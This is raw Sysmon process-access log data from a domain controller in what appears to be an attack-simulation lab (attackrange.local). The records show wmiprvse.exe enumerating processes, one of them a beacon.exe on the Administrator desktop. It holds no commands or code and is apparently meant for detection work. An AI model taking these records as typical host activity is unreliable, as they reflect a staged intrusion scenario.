16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236660Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236659Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236658Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236657Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236656Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236655Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236654Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236653Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236652Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236651Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.973{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236650Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.972{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236649Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.971{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236648Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.970{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236647Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.970{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236646Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.969{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236645Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.968{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236644Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.968{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236643Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.967{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236642Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.966{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236641Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 